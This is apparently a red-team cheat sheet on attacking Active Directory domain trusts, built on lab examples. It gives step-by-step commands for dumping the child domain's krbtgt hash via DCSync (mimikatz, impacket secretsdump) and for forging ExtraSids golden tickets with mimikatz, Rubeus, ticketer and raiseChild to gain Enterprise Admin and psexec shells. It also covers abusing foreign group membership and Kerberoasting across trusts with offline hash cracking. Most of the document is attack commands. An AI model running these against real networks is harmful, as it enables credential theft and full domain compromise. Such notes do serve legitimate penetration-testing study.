# Attacking Domain Trusts ## ExtraSids This attack allows for the compromise of a parent domain once the child domain has been compromised. The **`sidHistory`** attribute is used in migration scenarios. If a user in one domain is migrated to another domain, a new account is created in the second domain. The original user's SID will be added to the new user's SID history attribute, ensuring that the user can still access resources in the original domain. An attacker can perform SID history injection (due to a lack of SID Filtering protection) and add an administrator account to the SID History attribute of an account they control in the child domain. When logging in with this account, all of the SIDs associated with the account are added to the user's token. This token is used to determine what resources the account can access. We need: 1. `FQDN` - child domain 2. `KRBTGT hash` - child domain 3. `SID` - child domain 4. `USER` - child domain *(does not need to exist)* 5. `SID Enterprise Admin group` - root domain ### Locally - Windows {% tabs %} {% tab title="Get Data" %} `2` - `3` with [Mimikatz](https://github.com/gentilkiwi/mimikatz) *(Since we have compromised the child domain, we can log in as a Domain Admin or similar and perform the DCSync attack to obtain the NT hash for the KRBTGT account)* {% code overflow="wrap" %} ```powershell lsadump::dcsync /user:\krbtgt # take note of Domain SID (Security ID - Relative ID) ``` {% endcode %} `3` - `5` with [Old](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) or [New](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1) PowerView {% code overflow="wrap" %} ```powershell Get-DomainSID ``` {% endcode %} {% code overflow="wrap" %} ```powershell Get-DomainGroup -Domain -Identity "Enterprise Admins" | select distinguishedname,objectsid ``` {% endcode %} `5` with cmdlet Get-ADGroup {% code overflow="wrap" %} ```powershell Get-ADGroup -Identity "Enterprise Admins" -Server "" ``` {% endcode %} {% endtab %} {% tab title="Mimikatz" %} With [Mimikatz](https://github.com/gentilkiwi/mimikatz), create a Golden Ticket to access all resources within the parent domain {% code overflow="wrap" %} ```powershell mimikatz.exe > kerberos::golden /user: /domain: /sid: /krbtgt: /sids: /ptt ``` {% endcode %} check {% code overflow="wrap" %} ```powershell klist ls \\.\c$ ``` {% endcode %} {% endtab %} {% tab title="Rebeus" %} With [Rubeus](https://github.com/GhostPack/Rubeus), create a Golden Ticket to access all resources within the parent domain {% code overflow="wrap" %} ```powershell .\Rubeus.exe golden /rc4: /domain: /sid: /sids: /user: /ptt ``` {% endcode %} check {% code overflow="wrap" %} ```powershell klist ls \\.\c$ ``` {% endcode %} {% endtab %} {% endtabs %} ### Remotely - Linux {% tabs %} {% tab title="Get Data" %} `2` with [impacket-secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py) {% code overflow="wrap" %} ```bash secretsdump.py /@ -just-dc-user /krbtgt # secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt ``` {% endcode %} `3` - `5` with [impacket-lookupsid.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py) (bruteforce SID) {% code overflow="wrap" %} ```bash lookupsid.py /@ | grep "Domain SID" ``` {% endcode %} {% code overflow="wrap" %} ```bash lookupsid.py /@ | grep "Domain SID" lookupsid.py /@ | grep "Enterprise Admins" # - ``` {% endcode %} {% endtab %} {% tab title="Ticketer" %} Use [impacket-ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py) to construct a Golden Ticket. This ticket will be valid to access resources in the child domain (specified by `-domain-sid`) and the parent domain (specified by `-extra-sid`). {% code overflow="wrap" %} ```bash ticketer.py -nthash -domain -domain-sid -extra-sid ``` {% endcode %} Now import the ticket and use it {% code overflow="wrap" %} ```bash export KRB5CCNAME=.ccache ``` {% endcode %} {% code overflow="wrap" %} ```bash psexec.py /@. -k -no-pass -target-ip ``` {% endcode %} {% endtab %} {% tab title="RaiseChild" %} USe [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py) to automate the process {% code overflow="wrap" %} ```bash raiseChild.py -target-exec / ``` {% endcode %}
Workflow Input: 1. Child-domain Admin credentials (password, hashes or aesKey) in the form of '`domain/username[:password]`'\ The domain specified MUST be the domain FQDN. 2. Optionally a pathname to save the generated golden ticket (`-w` switch) 3. Optionally a target-user RID to get credentials (`-targetRID` switch)\ Administrator by default. 4. Optionally a target to PSEXEC with the target-user privileges to (`-target-exec` switch).\ Enterprise Admin by default. Process: 1. Find out where the child domain controller is located and get its info (via `[MS-NRPC]`) 2. Find out what the forest FQDN is (via `[MS-NRPC]`) 3. Get the forest's Enterprise Admin SID (via `[MS-LSAT]`) 4. Get the child domain's krbtgt credentials (via `[MS-DRSR]`) 5. Create a Golden Ticket specifying SID from 3) inside the `KERB_VALIDATION_INFO`'s ExtraSids array and setting expiration 10 years from now 6. Use the generated ticket to log into the forest and get the target user info (`krbtgt/admin` by default) 7. If file was specified, save the golden ticket in ccache format 8. If target was specified, a `PSEXEC` shell is launched Output: 1. Target user credentials (Forest's `krbtgt/admin` credentials by default) 2. A golden ticket saved in ccache for future fun and profit 3. PSExec Shell with the target-user privileges (Enterprise Admin privileges by default) at target-exec parameter.
{% endtab %} {% endtabs %} ## Foreign Group Membership We may see users or admins from Domain A as members of a group in Domain B. Only `Domain Local Groups` allow security principals from outside its forest. We may see a Domain Admin or Enterprise Admin from Domain A as a member of the built-in Administrators group in Domain B in a bidirectional forest trust relationship. If we can take over this admin user in Domain A, we would gain full administrative access to Domain B based on group membership. Use the PowerView function [Get-DomainForeignGroupMember](https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainForeignGroupMember) {% code overflow="wrap" %} ```powershell Get-DomainForeignGroupMember -Domain # take note of MemberName ``` {% endcode %} {% code overflow="wrap" %} ```powershell Convert-SidToName ``` {% endcode %} Now we can verify the access to the target domain using the `Enter-PSSession` cmdlet to connect over WinRM. {% code overflow="wrap" %} ```powershell Enter-PSSession -ComputerName . -Credential ``` {% endcode %} ## Kerberoasting Domain with an inbound or bidirectional domain/forest trust {% tabs %} {% tab title="Locally" %} Enumaration SPN on the domain target with [Old](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) or [New](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1) PowerView {% code overflow="wrap" %} ```powershell Get-DomainUser -Domain |select samaccountname,memberof ``` {% endcode %} [Kerberosting](https://ivalexev.gitbook.io/rednote/pentesting-process/active-directory/kerberoasting) with [Rubeus](https://github.com/GhostPack/Rubeus) {% code overflow="wrap" %} ```powershell .\Rubeus.exe kerberoast /domain: /user: /nowrap ``` {% endcode %} Offline cracking of output with hashcat (`-m 13100`) {% endtab %} {% tab title="Remotely" %} Enumaration SPN on the domain target with [impacket-GetUserSPNs](https://github.com/fortra/impacket/blob/master/examples/GetUserSPNs.py) {% code overflow="wrap" %} ```bash GetUserSPNs.py -target-domain / ``` {% endcode %} Rerunning the command with the `-request` flag added gives us the TGS ticket. {% code overflow="wrap" %} ```bash GetUserSPNs.py -request -target-domain / [-outputfile ] ``` {% endcode %} Offline cracking of output with hashcat (`-m 13100`) {% endtab %} {% endtabs %}